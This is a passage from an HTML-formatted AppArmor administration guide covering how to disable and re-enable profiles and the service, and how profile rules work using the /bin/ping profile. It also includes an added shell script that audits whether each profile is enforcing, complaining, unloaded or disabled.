<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo ln -s /etc/apparmor.d/profile.name /etc/apparmor.d/disable/</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo apparmor_parser -R /etc/apparmor.d/profile.name</span>
</span></pre>
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">re-enable</span> a disabled profile, remove the symbolic link to the profile in <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/disable/</span>. Then load the profile using the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">-a</span> option.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo rm /etc/apparmor.d/disable/profile.name</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cat /etc/apparmor.d/profile.name | sudo apparmor_parser -a</span>
</span></pre>
</div>
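<div class="para">
Added example, not part of the original guide: a POSIX shell audit that reports whether each profile is in enforce mode, in complain mode, unloaded, or disabled through the disable/ symlink (including the case where the symlink exists but the profile was never removed with -R). The function names, the simplified profile-header parsing and the sample tree are assumptions made for illustration; the kernel listing is read from securityfs at /sys/kernel/security/apparmor/profiles.
</div>

```shell
#!/bin/sh
# Added example (not from the original guide): audit profile state from the
# two places the commands above change it:
#   - <profile dir>/disable/  symlinks created with "ln -s" to disable a profile
#   - the kernel's loaded-profile listing, one "name (mode)" entry per line
# Defaults point at the real locations; the demo at the end uses constructed data.

# Print the profile name declared in a profile file.
# Simplification (assumption): handles only headers such as
#   /usr/sbin/foo {     /usr/sbin/foo flags=(complain) {     profile foo ... {
profile_name() {
    awk '
        /^[ \t]*#/ { next }                      # comments and #include lines
        /[{][ \t]*$/ {
            name = ($1 == "profile") ? $2 : $1
            print name
            exit
        }
    ' "$1"
}

# Print the mode the kernel reports for profile $1 in listing $2, or nothing.
loaded_mode() {
    [ -r "$2" ] || return 0
    awk -v want="$1" '
        {
            mode = $NF; gsub(/[()]/, "", mode)   # "(enforce)" -> "enforce"
            name = $0;  sub(/ [(][^)]*[)]$/, "", name)
            if (name == want) { print mode; exit }
        }
    ' "$2"
}

# One line per profile file: <file> <profile name> <state>, tab separated.
# state: enforce | complain | unloaded | disabled | disabled-still-loaded
profile_states() {
    dir=${1:-/etc/apparmor.d}
    listing=${2:-/sys/kernel/security/apparmor/profiles}
    for f in "$dir"/*; do
        [ -f "$f" ] || continue                  # skip disable/, abstractions/, ...
        name=$(profile_name "$f")
        [ -n "$name" ] || continue               # not a profile file
        mode=$(loaded_mode "$name" "$listing")
        if [ -L "$dir/disable/${f##*/}" ]; then
            # The symlink only keeps the profile from being loaded again; a
            # profile already in the kernel stays there until it is removed
            # with "apparmor_parser -R" or the system reboots.
            if [ -n "$mode" ]; then
                state=disabled-still-loaded
            else
                state=disabled
            fi
        else
            state=${mode:-unloaded}
        fi
        printf '%s\t%s\t%s\n' "${f##*/}" "$name" "$state"
    done
}

# Profiles whose state is anything other than plain "enforce".
not_enforcing() {
    profile_states "$@" | awk -F '\t' '$3 != "enforce" { print $2 " (" $3 ")" }'
}

# Build a constructed profile tree and kernel listing; prints the tree's path.
build_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/apparmor.d/disable" "$root/apparmor.d/abstractions"
    printf '#include <tunables/global>\n/usr/sbin/alpha {\n}\n' \
        > "$root/apparmor.d/usr.sbin.alpha"
    printf '/usr/bin/beta flags=(complain) {\n}\n' > "$root/apparmor.d/usr.bin.beta"
    printf 'profile gamma /opt/gamma/bin/gamma {\n}\n' > "$root/apparmor.d/opt.gamma"
    printf '/usr/sbin/delta {\n}\n'   > "$root/apparmor.d/usr.sbin.delta"
    printf '/usr/sbin/epsilon {\n}\n' > "$root/apparmor.d/usr.sbin.epsilon"
    # delta: symlinked but never removed with -R; epsilon: disabled properly
    ln -s "$root/apparmor.d/usr.sbin.delta"   "$root/apparmor.d/disable/"
    ln -s "$root/apparmor.d/usr.sbin.epsilon" "$root/apparmor.d/disable/"
    printf '%s\n' '/usr/sbin/alpha (enforce)' '/usr/bin/beta (complain)' \
                  '/usr/sbin/delta (enforce)' > "$root/loaded"
    echo "$root"
}

# Demo on the constructed data (runs offline, needs no root privileges).
demo_root=$(build_sample_tree)
profile_states "$demo_root/apparmor.d" "$demo_root/loaded"
[ -n "$demo_root" ] && rm -rf "$demo_root"
```

On a real system, run profile_states with no arguments as root, since the securityfs listing is normally readable by root only.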
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> can be disabled, and the kernel module unloaded by entering the following:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo service apparmor stop</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo update-rc.d -f apparmor remove</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To re-enable <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> enter:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo service apparmor start</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo update-rc.d apparmor defaults</span></span></pre>
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span style="font-family: Times, 'Times New Roman', serif;"><div class="hgroup" style="border-bottom-color: rgb(204, 193, 193); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<h2 class="title" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 28px; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
Profiles</h2>
</div>
<div class="region" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="contents" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> profiles are simple text files located in <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/</span>. The files are named after the full path to the executable they profile replacing the "/" with ".". For example <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/bin.ping</span> is the AppArmor profile for the <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/bin/ping</span> command.</div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
There are two main types of rules used in profiles:</div>
<div class="list itemizedlist" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Path entries:</span> which detail which files an application can access in the file system.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Capability entries:</span> determine what privileges a confined process is allowed to use.</div>
</li>
</ul>
</div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
As an example take a look at <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/bin.ping</span>:</div>
<div class="code" style="background-attachment: initial; background-clip: initial; background-color: white; background-origin: initial; background-position: 100% 0%; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;">#include <tunables/global>
/bin/ping flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/consoles>
  #include <abstractions/nameservice>

  capability net_raw,
  capability setuid,
  network inet raw,

  /bin/ping mixr,
  /etc/modules.conf r,
}
</pre>
</div>
<div class="list itemizedlist" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">#include <tunables/global>:</span> include statements from other files. This allows statements pertaining to multiple applications to be placed in a common file.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/bin/ping flags=(complain):</span> path to the profiled program, also setting the mode to <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">complain</span>.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">capability net_raw,:</span> allows the application access to the CAP_NET_RAW Posix.1e capability.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
